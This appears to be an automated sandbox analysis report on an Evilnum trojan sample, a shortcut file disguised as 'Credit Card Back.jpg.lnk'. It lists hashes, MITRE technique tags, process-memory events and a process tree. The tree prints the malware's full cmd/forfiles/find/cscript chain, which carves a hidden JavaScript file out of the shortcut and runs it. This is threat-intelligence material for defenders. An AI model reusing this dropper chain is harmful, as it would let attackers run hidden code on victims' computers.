evilnum | ca23b0c263652259fc9163d9981033913c9aa3d51a23b1e43f145ca0e0960a30

Analysis

Target

ca23b0c263652259fc9163d9981033913c9aa3d51a23b1e43f145ca0e0960a30.lnk
Size

61KB
MD5

41a80cc28047b7aeafe846aaa23c2cfe
SHA1

513b161299d99f4be1dffbb171b7c4040ff83de7
SHA256

ca23b0c263652259fc9163d9981033913c9aa3d51a23b1e43f145ca0e0960a30
SHA512

5f2be20007d35a9fd48bb7ef8229f51d119f2c002e25d2ecb99813a8eb585b752917ef136e219c08fddd5e685671af36052f48a863f5f9dac189ea9e6947c437

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1528 wrote to memory of 292	1528	cmd.exe	28
PID 1528 wrote to memory of 292	1528	cmd.exe	28
PID 1528 wrote to memory of 292	1528	cmd.exe	28
PID 292 wrote to memory of 452	292	cmd.exe	29
PID 292 wrote to memory of 452	292	cmd.exe	29
PID 292 wrote to memory of 452	292	cmd.exe	29
PID 292 wrote to memory of 1272	292	cmd.exe	30
PID 292 wrote to memory of 1272	292	cmd.exe	30
PID 292 wrote to memory of 1272	292	cmd.exe	30
PID 292 wrote to memory of 620	292	cmd.exe	31
PID 292 wrote to memory of 620	292	cmd.exe	31
PID 292 wrote to memory of 620	292	cmd.exe	31
PID 292 wrote to memory of 1096	292	cmd.exe	32
PID 292 wrote to memory of 1096	292	cmd.exe	32
PID 292 wrote to memory of 1096	292	cmd.exe	32
PID 292 wrote to memory of 1772	292	cmd.exe	33
PID 292 wrote to memory of 1772	292	cmd.exe	33
PID 292 wrote to memory of 1772	292	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\ca23b0c263652259fc9163d9981033913c9aa3d51a23b1e43f145ca0e0960a30.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1528
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Credit Card Back.jpg.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Cred*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:292
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Cred*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:1272
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:1096
- - C:\Windows\system32\cscript.exe
    cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:1772

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/1528-55-0x000007FEFC261000-0x000007FEFC263000-memory.dmp

Filesize
8KB

Download